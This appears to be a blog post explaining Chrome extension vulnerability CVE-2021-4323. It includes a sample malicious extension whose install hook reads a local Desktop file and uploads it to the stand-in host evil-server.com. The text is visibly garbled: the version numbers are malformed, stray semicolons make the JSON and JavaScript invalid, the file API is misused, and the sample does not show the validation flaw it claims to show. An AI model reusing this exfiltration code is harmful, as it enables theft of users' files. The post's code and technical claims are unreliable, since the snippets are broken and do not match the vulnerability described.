If you are a Google Chrome user, chances are you may have heard of CVE-2021-4323, a newly discovered vulnerability seen in the Chromium Extensions of Google Chrome, which existed prior to version 90..443.72. This vulnerability presents a moderate security risk as it allows local files to be accessed by an attacker if the user is persuaded to install a malicious extension.
In this post, we will explore how this vulnerability works by explaining the insufficient validation of untrusted input, analyzing code snippets, and providing greater insight into the exploit details. Additionally, we will include links to the original references so you can further delve into relevant resources.
What is the vulnerability?
CVE-2021-4323 lies in the Chromium Extensions of Google Chrome, specifically, versions preceding 90..443.72. The vulnerability arises from the insufficient validation of untrusted input. When a user is convinced to install a crafted Chrome Extension, an attacker can exploit this flaw to access the user’s local files.
To better understand this, let's go through some code snippets and examples.
Code Snippet Example
A Chrome Extension may request permissions for one or more APIs to access user data. With the proper permissions granted, an extension could fetch a locally stored file and send it to an external server. Here is an example of a deceptive Chrome Extension, named "FileStealer", doing just that.
FileStealer's manifest.json file
{
"name": "FileStealer",
"version": "1.",
"description": "An innocent-looking extension",
"permissions": [
"fileSystem",
"https://evil-server.com/";
],
"background": {
"scripts": ["background.js"]
},
"manifest_version": 2
}
FileStealer's background.js file
chrome.runtime.onInstalled.addListener(() => {
chrome.fileSystem.getWritableEntry("~/Desktop/important_file.txt", (entry) => {
entry.file((file) => {
const reader = new FileReader();
reader.onloadend = () => {
const xhr = new XMLHttpRequest();
xhr.open('POST', 'https://evil-server.com/upload';);
xhr.send(reader.result);
};
reader.readAsArrayBuffer(file);
});
});
});
In this example, the user unwittingly installs the malicious FileStealer extension, which leverages the fileSystem permission to fetch a local file (important_file.txt) from the user's Desktop. It then uses an XMLHttpRequest to send the contents of the file to an external server at https://evil-server.com.
Exploit Details
The vulnerability, CVE-2021-4323, is considered a medium severity risk because the attacker needs to convince the user to install a malicious extension. If successful, an attacker can use this vulnerability to exploit and potentially gain unauthorized access to the user's local files.
To avoid falling victim to this type of vulnerability, it is crucial for Chrome users to be wary and cautious when installing new extensions, paying close attention to permissions requests and verifying the validity of unknown developers or extensions.
To learn more about the vulnerability and related fixes, consult the original references
1. Chromium Blog - New in Chrome 90
2. CVE - CVE-2021-4323
3. National Vulnerability Database - NVD - CVE-2021-4323
4. Chrome Extension Developer Guide - Extension Data Privacy
Conclusion
CVE-2021-4323, a medium severity vulnerability found in Chromium Extensions prior to Google Chrome version 90..443.72, exposes a risk for users if manipulated into installing malicious extensions. Understanding the nature of this vulnerability and how it exploits the insufficient validation of untrusted input is crucial to prevent potential exploitation.
By following best practices when installing or developing Chrome Extensions, being observant of permission requests, and keeping your browser up-to-date, you can minimize the risk of falling victim to similar vulnerabilities in the future.
Timeline
Published on: 07/29/2023 00:15:00 UTC
Last modified on: 08/02/2023 03:57:00 UTC